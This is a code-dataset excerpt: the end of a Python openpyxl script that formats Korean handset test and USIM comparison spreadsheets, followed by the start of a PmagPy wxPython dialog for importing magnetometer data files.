'BT 무선성능(제조사 자체 측정)']\n list_items_2 = ['무선기기 형식등록', 'GCF 인증서', 'WiFi 인증서', 'NFC 인증서', 'Bluetooth 인증서']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:D1')\n sheet_out['A1'] = '첨부2. 
납품검사'\n\n # sheet row 3 handle\n sheet_out['A3'] = '▣ 장소 : (빈곳)'\n\n # 4~16 row\n sheet_out['A4'] = '구분'\n sheet_out.merge_cells('B4:C4')\n sheet_out['B4'] = 'Item'\n sheet_out['D4'] = '결과'\n\n sheet_out.merge_cells('A5:A8')\n sheet_out['A5'] = '신뢰성 시험'\n sheet_out.merge_cells('A9:A16')\n sheet_out['A9'] = 'Performance'\n\n for i in range(5, 17):\n sheet_out.merge_cells('B' + str(i) + ':C' + str(i))\n sheet_out['B' + str(i)] = list_items[i - 5]\n\n # 18~24 row\n sheet_out['A18'] = '▣ 시험 인증서 (PLM 등록)'\n sheet_out['A19'] = '구분'\n sheet_out.merge_cells('B19:C19')\n sheet_out['B19'] = 'Item'\n sheet_out['D19'] = '결과'\n\n sheet_out.merge_cells('A20:A24')\n sheet_out['A20'] = '인증서'\n\n for i in range(20, 25):\n sheet_out.merge_cells('B' + str(i) + ':C' + str(i))\n sheet_out['B' + str(i)] = list_items_2[i - 20]\n\n\n self.setPrintText('/s {}번 파일 \"첨부2\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D24\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A18'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:D16\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A19:D24\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:D24\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15.88, 23.75, 17]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [4, 19]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in range(5,17):\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n\n for i in range(20,25):\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"첨부2\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 첨부 3 측정기준 Tab\n def attach_generate_data_3(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item)\n # option setting wb.output\n sheet_out = wb_output['첨부3. 단말 상세 SPEC']\n list_items = ['모뎀', 'RFIC', 'Display', '크기', '배터리 용량', 'Flash ROM', 'SRAM', '카메라', '사운드', 'MIC', '방수/방진', '페이', '생체인식',\n '충전', '기타', 'LTE 주파수', 'LTE 로밍 지원 주파수', 'WCDMA 주파수', 'OS(출시버전)', '출시']\n list_items_2 = ['5G NW options', '5G Frequency', 'UE-Category', 'Max Throughput', 'ENDC capability',\n 'LTE capability', 'Modulation', 'MIMO', 'CSI-RS', 'Power', 'Waveform']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = '첨부3. 
단말 상세 SPEC'\n\n # sheet row 2 handle\n sheet_out['A2'] = '▣ 기본 정보 '\n\n # 3~23 row\n sheet_out['A3'] = '구분'\n sheet_out['B3'] = '모델1'\n sheet_out['C3'] = 'Ref. 모델'\n\n for i in range(4, 24):\n sheet_out['A' + str(i)] = list_items[i - 4]\n\n # 25~37 row\n sheet_out['A25'] = '▣ N/W Feature 비교'\n sheet_out['A26'] = '구분'\n sheet_out['B26'] = '모델1'\n sheet_out['C26'] = 'Ref. 모델'\n\n for i in range(27, 38):\n sheet_out['A' + str(i)] = list_items_2[i - 27]\n\n self.setPrintText('/s {}번 파일 \"첨부3\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:C37\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A2'].alignment = self.top_alignment\n sheet_out['A25'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A3:C23\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A26:C37\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:C3\"]:\n for cell in mCell:\n cell.font = self.index_font\n for mCell in sheet_out[\"A4:C23\"]:\n for cell in mCell:\n cell.font = self.value_font\n for mCell in sheet_out[\"A25:C26\"]:\n for cell in mCell:\n cell.font = self.index_font\n for mCell in sheet_out[\"A27:C37\"]:\n for cell in mCell:\n cell.font = self.value_font\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C']\n sheet_width_list = [20.13, 39, 39]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [3, 26]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n\n for i in range(4, 24):\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n for i in range(27, 38):\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"첨부3\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. 
{}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # f2 function\n def f2_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_output = openpyxl.load_workbook(item, data_only=True)\n # option setting wb.output\n sheet_in = wb_output['Profile']\n wb_output.create_sheet('Comparison', 2)\n sheet_out = wb_output['Comparison']\n # 1st list items are fixed usim info, 2nd list items are variable usim info\n list_find = [['ESN', 'HPPLMN', 'HPLMNNWACT', 'FPLMN', 'PWS', 'HPLMNwACT', 'DOMAIN'],\n ['IMEI', 'IMSI', 'KEYS', 'KEYSPS', 'MSISDN', 'SMSP', 'PSLOCI', 'ACC', 'LOCI', 'IMSI_M',\n 'MDN', 'IRM', 'IMPI', 'IMPU', 'P_CSCF']]\n list_fixed_item = []\n list_variable_item = []\n list_reference_item = [\n '0000FFFFFFFFFFFF',\n '01',\n '54F050400054F0508000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000',\n '54F08054F06054F00354F040',\n 'FCFFFFFFFFFFFFFFFFFF',\n '54F050400054F0508000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000',\n '800A736B74696D732E6E6574FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF',\n ]\n\n total_row = len(sheet_in['A'])\n\n # sheet row 1 handle\n sheet_out.merge_cells('B1:E1')\n sheet_out['B1'] = 'USIM DATA COMPARISON'\n # sheet row 2 handle\n sheet_out['B2'] = 'EF파일명'\n sheet_out['C2'] = 'DATA값'\n sheet_out['D2'] = '고정기준값'\n sheet_out['E2'] = '비교'\n\n # finding fixed value\n for fixed in list_find[0]:\n for i in range(2, total_row+1):\n if sheet_in['A' + str(i)].value == fixed:\n data = sheet_in['Q' + str(i)].value.strip()\n data = re.sub(r'[\\n,\\s,\\t]', '', data)\n list_fixed_item.append(data)\n break\n\n # finding variable value\n for variable in list_find[1]:\n for i in range(2, total_row+1):\n if sheet_in['A' + str(i)].value == variable:\n data = sheet_in['Q' + str(i)].value.strip()\n data = re.sub(r'[\\n,\\s,\\t]', '', data)\n list_variable_item.append(data)\n break\n\n # red\n # 3~ 24 rows fill data\n # 3~9까지 fixed\n # 10~24까지 variable\n\n # all cell font adjust\n for mCell in sheet_out[\"B2:E24\"]:\n for cell in mCell:\n cell.font = self.f2_value_font\n\n sheet_out['B1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n # 고정값 Set\n for i, f_item in enumerate(list_fixed_item):\n sheet_out['B' + str(i + 3)] = list_find[0][i]\n sheet_out['B' + str(i + 3)].fill = self.yellow_fill\n sheet_out['C' + str(i + 3)] = f_item\n sheet_out['D' + str(i + 3)] = list_reference_item[i]\n sheet_out['D' + str(i + 3)].fill = self.yellow_fill\n\n if list_fixed_item[i] == list_reference_item[i]:\n sheet_out['E' + str(i + 3)] = 'True(일치함)'\n sheet_out['E' + str(i + 3)].font = self.f2_blue_font\n else:\n sheet_out['E' + str(i + 3)] = 'False(불일치)'\n sheet_out['E' + str(i + 3)].font = self.f2_red_font\n\n sheet_out['E' + str(i + 3)].fill = self.yellow_fill\n\n # 가변값 Set\n for i, v_item in enumerate(list_variable_item):\n sheet_out['B' + str(i + 10)] = list_find[1][i]\n sheet_out['B' + str(i + 10)].fill = self.orange_fill\n sheet_out['C' + str(i + 10)] = v_item\n sheet_out['D' + str(i + 10)].fill = self.orange_fill\n sheet_out['E' + str(i + 10)].fill = self.orange_fill\n\n self.setPrintText('/s {}번 파일 \"Comparison\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"B2:E24\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # top alignment adjust\n for mCell in 
sheet_out[\"C4:C24\"]:\n for cell in mCell:\n cell.alignment = self.top_alignment_3\n\n for mCell in sheet_out[\"D4:D24\"]:\n for cell in mCell:\n cell.alignment = self.top_alignment_3\n\n # all cell border adjust\n for mCell in sheet_out[\"B2:E24\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # set filter\n sheet_out.auto_filter.ref = \"B2:E24\"\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E']\n sheet_width_list = [4.25, 14.75, 57, 57, 23]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n sheet_out['B2'].fill = self.brown_fill\n sheet_out['C2'].fill = self.brown_fill\n sheet_out['D2'].fill = self.brown_fill\n sheet_out['E2'].fill = self.brown_fill\n\n\n self.currentRow = self.currentRow + 1\n self.totalRows = self.totalRows + 1\n self.progress_flag.emit()\n self.setPrintText('/s {}번 파일 \"Comparison\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # main method\n def run(self):\n\n try:\n ###########################__Setting print Text Thread__######################\n\n self.thread_count = threading.Thread(target=self.getCountRows, args=())\n self.thread_count.daemon = True\n self.thread_count.start()\n self.nowTime = datetime.today().strftime(\"%Y-%m-%d\")\n\n #################################################################_SETTING INPUT_###########################################################################\n # Save root directory\n self.flag_root = os.path.isdir(self.home+\"\\\\Desktop\\\\DOC\\\\\")\n if not self.flag_root:\n os.mkdir(self.home + \"\\\\Desktop\\\\DOC\\\\\")\n\n # extract file name each list_files and make every out file path\n for item in self.list_files:\n temp_filename = os.path.basename(item)\n temp_filename = re.sub(\"(.xlsx|.xls)\", \"\", temp_filename)\n output_file = self.home+\"\\\\Desktop\\\\DOC\\\\result_\"+temp_filename+\"(\"+self.nowTime+\").xlsx\"\n self.list_out_files.append(output_file)\n\n if self.modeFlag == \"f1\":\n\n #################################################################_RESULT FILE Generate_###########################################################################\n # output file generate\n for item in self.list_out_files:\n\n wb = Workbook()\n s1 = wb.active\n s1.title = \"검증결과요약\"\n wb.create_sheet('시험결과요약', 1)\n wb.create_sheet('TRP', 2)\n wb.create_sheet('TIS', 3)\n wb.create_sheet('속도', 4)\n wb.create_sheet('Call Setup Test', 5)\n wb.create_sheet('주파수동조', 6)\n wb.create_sheet('MOS', 7)\n wb.create_sheet('배터리소모전류(시간)', 8)\n wb.create_sheet('배터리소모전류 세부데이터', 9)\n wb.create_sheet('배터리소모전류(DOU)', 10)\n wb.create_sheet('첨부1. 측정기준 및 가점', 11)\n wb.create_sheet('첨부2. 납품검사', 12)\n wb.create_sheet('첨부3. 
단말 상세 SPEC', 13)\n wb.save(item)\n\n self.setPrintText(\"/s Complete making Result excel file /e\")\n self.setPrintText(\"/s Extract Original Data in each file /e\")\n\n #Core Code\n self.start_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n # log start time\n self.setPrintText(\"/s STARTED_TIME: \"+self.start_time+\" /e\")\n\n ########################################################################Start to generate openpyXL Sheet Style########################################################################\n # 검증결과요약 탭 생성\n self.summary_generate_data()\n self.totalRows = 1\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 시험결과요약 탭 생성\n self.test_generate_data()\n self.totalRows = 2\n self.currentRow = 0\n self.progress_flag.emit()\n\n # TRP 탭 생성\n self.trp_generate_data()\n self.totalRows = 3\n self.currentRow = 0\n self.progress_flag.emit()\n\n # TIS 탭 생성\n self.tis_generate_data()\n self.totalRows = 4\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 속도 탭 생성\n self.spd_generate_data()\n self.totalRows = 5\n self.currentRow = 0\n self.progress_flag.emit()\n\n # Call Setup Test 탭 생성\n self.call_generate_data()\n self.totalRows = 6\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 주파수동조 탭 생성\n self.fre_generate_data()\n self.totalRows = 7\n self.currentRow = 0\n self.progress_flag.emit()\n\n # MOS 탭 생성\n self.mos_generate_data()\n self.totalRows = 8\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 배터리소모전류(DOU) 탭 생성\n self.dou_generate_data()\n self.totalRows = 9\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 배터리소모전류 세부데이터 탭 생성\n self.bat_generate_data()\n self.totalRows = 10\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 배터리소모전류(시간) 탭 생성\n self.time_generate_data()\n self.totalRows = 11\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 첨부1. 측정기준 및 가점 탭 생성\n self.attach_generate_data_1()\n self.totalRows = 12\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 첨부2. 납품검사 탭 생성\n self.attach_generate_data_2()\n self.totalRows = 13\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 첨부3. 단말 상세 SPEC 탭 생성\n self.attach_generate_data_3()\n self.totalRows = 14\n self.currentRow = 0\n self.progress_flag.emit()\n\n #############################################__progress 100%__#############################################\n self.end_count = \"y\"\n self.end_flag.emit()\n\n #Core Code\n self.end_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n # log end time\n self.setPrintText(\"/s FINISHED_TIME: \"+self.end_time+\" /e\")\n\n else:\n #Core Code\n self.start_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n # log start time\n self.setPrintText(\"/s STARTED_TIME: \"+self.start_time+\" /e\")\n self.f2_generate_data()\n self.end_count = \"y\"\n self.end_flag.emit()\n #Core Code\n self.end_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n # log end time\n self.setPrintText(\"/s FINISHED_TIME: \"+self.end_time+\" /e\")\n\n except:\n self.setPrintText('/s Error: {}. 
{}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\nif __name__ == '__main__':\n moduler = Formater('C:\\\\Users\\\\TestEnC\\\\Desktop\\\\VOC\\\\input_sample.xlsx', 'y', 'f1')\n moduler.run()\n", "sub_path": "docBeFormater/newModule.py", "file_name": "newModule.py", "file_ext": "py", "file_size_in_byte": 171877, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtCore.QThread", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 28, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QThread.__init__", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QThread", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 48, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 53, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 60, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 61, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 62, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 63, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 64, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 65, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 66, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 67, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 68, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 71, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 72, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 73, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 74, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 75, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 76, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 77, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 80, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 81, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 82, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 83, "usage_type": "call"}, {"api_name": "openpyxl.styles.borders.Border", "line_number": 86, "usage_type": "call"}, {"api_name": "openpyxl.styles.borders.Side", "line_number": 86, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 99, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 107, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 120, "usage_type": "call"}, {"api_name": 
"openpyxl.load_workbook", "line_number": 197, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 198, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 524, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 535, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 536, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 665, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 701, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 711, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 712, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 881, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 907, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 917, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 918, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1100, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1127, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1137, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1138, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1431, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1462, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1472, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1473, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1521, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1544, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1554, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1555, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1662, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1687, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1697, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1698, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1781, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1807, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1818, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1819, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1949, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1983, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1993, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1994, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 2436, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 2500, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 2510, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 2832, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 2888, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 2898, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 2993, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 3021, 
"usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 3031, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 3105, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 3135, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 3145, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 3213, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 3240, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 3250, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 3287, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 3296, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 3310, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 3386, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 3396, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 3399, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3399, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 3403, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3403, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 3405, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 3409, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3409, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 3410, "usage_type": "call"}, {"api_name": "openpyxl.Workbook", "line_number": 3420, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 3442, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3442, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 3536, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3536, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 3542, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3542, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 3549, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3549, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 3554, "usage_type": "call"}]} +{"seq_id": "373122207", "text": "#!/usr/bin/env pythonw\n\n#--------------------------------------------------------------\n# converting magnetometer files to MagIC format\n#--------------------------------------------------------------\nimport wx\nimport wx.grid\nimport os\nimport subprocess\nimport sys\nfrom pmagpy import pmag\nfrom pmagpy import ipmag\nfrom pmagpy import convert_2_magic as convert\nfrom dialogs import pmag_widgets as pw\nfrom dialogs import drop_down_menus3\nfrom dialogs import magic_grid2 as magic_grid\n#sys.path.append(\"../programs\") #later fix imports further down in code to \"from programs import ....\" also imports should be moved to top of file unless import is so large it slows down the program\nfrom pmagpy import convert_2_magic as convert\nfrom programs.conversion_scripts import tdt_magic\nfrom programs.conversion_scripts import jr6_txt_magic\nfrom programs.conversion_scripts import jr6_jr6_magic\nfrom programs.conversion_scripts import iodp_jr6_magic\nfrom pmagpy.mapping import map_magic\n\n\nclass import_magnetometer_data(wx.Dialog):\n def __init__(self, parent, id, title, WD):\n wx.Dialog.__init__(self, parent, id, title, name='import_magnetometer_data')\n 
self.parent = parent\n self.WD = WD\n self.InitUI()\n self.SetTitle(title)\n\n\n def InitUI(self):\n self.panel = wx.Panel(self)\n vbox = wx.BoxSizer(wx.VERTICAL)\n\n formats = ['generic format','SIO format','CIT format','2g-binary format','2g-ascii format',\n 'HUJI format','LDEO format','IODP format','PMD (ascii) format',\n 'TDT format', 'JR6 format', 'Utrecht format', 'BGC format']\n sbs = wx.StaticBoxSizer(wx.StaticBox(self.panel, wx.ID_ANY, 'step 1: choose file format'), wx.VERTICAL)\n sbs.AddSpacer(5)\n\n radio_buttons = []\n for fmt in formats:\n radio_button = wx.RadioButton(self.panel, -1, label=fmt, name=fmt)\n radio_buttons.append(radio_button)\n sbs.Add(radio_button, flag=wx.BOTTOM, border=5)\n if len(radio_buttons) == 1:\n sbs.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n #sbs.AddSpacer(5)\n self.Bind(wx.EVT_RADIOBUTTON, self.OnRadioButtonSelect, radio_button)\n\n radio_buttons[0].SetValue(True)\n self.checked_rb = radio_buttons[0]\n\n #---------------------\n # OK/Cancel buttons\n #---------------------\n\n hboxok = wx.BoxSizer(wx.HORIZONTAL)\n self.okButton = wx.Button(self.panel, id=-1, label='Import file')\n self.okButton.SetDefault()\n self.Bind(wx.EVT_BUTTON, self.on_okButton, self.okButton)\n self.cancelButton = wx.Button(self.panel, wx.ID_CANCEL, '&Cancel')\n self.Bind(wx.EVT_BUTTON, self.on_cancelButton, self.cancelButton)\n self.Bind(wx.EVT_CLOSE, self.on_cancelButton)\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n\n self.nextButton = wx.Button(self.panel, id=-1, label='Go to next step')\n self.Bind(wx.EVT_BUTTON, self.on_nextButton, self.nextButton)\n hboxok.Add(self.okButton)\n hboxok.AddSpacer(20)\n hboxok.Add(self.cancelButton )\n hboxok.AddSpacer(20)\n hboxok.Add(self.nextButton )\n\n #-----------------------\n # design the frame\n #-----------------------\n vbox.AddSpacer(10)\n vbox.Add(sbs)\n vbox.AddSpacer(10)\n vbox.Add(hboxok)\n vbox.AddSpacer(10)\n\n hbox1=wx.BoxSizer(wx.HORIZONTAL)\n hbox1.AddSpacer(10)\n hbox1.Add(vbox)\n hbox1.AddSpacer(10)\n\n self.panel.SetSizer(hbox1)\n hbox1.Fit(self)\n\n #-----------------------\n # button methods\n #-----------------------\n\n def on_cancelButton(self,event):\n self.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n\n\n def on_okButton(self,event):\n os.chdir(self.WD)\n file_type = self.checked_rb.Label.split()[0] # extracts name of the checked radio button\n if file_type == 'generic':\n dia = convert_generic_files_to_MagIC(self, self.WD, \"PmagPy generic file conversion\")\n elif file_type == 'SIO':\n dia = convert_SIO_files_to_MagIC(self, self.WD, \"PmagPy SIO file conversion\")\n elif file_type == 'CIT':\n dia = convert_CIT_files_to_MagIC(self, self.WD, \"PmagPy CIT file conversion\")\n elif file_type == 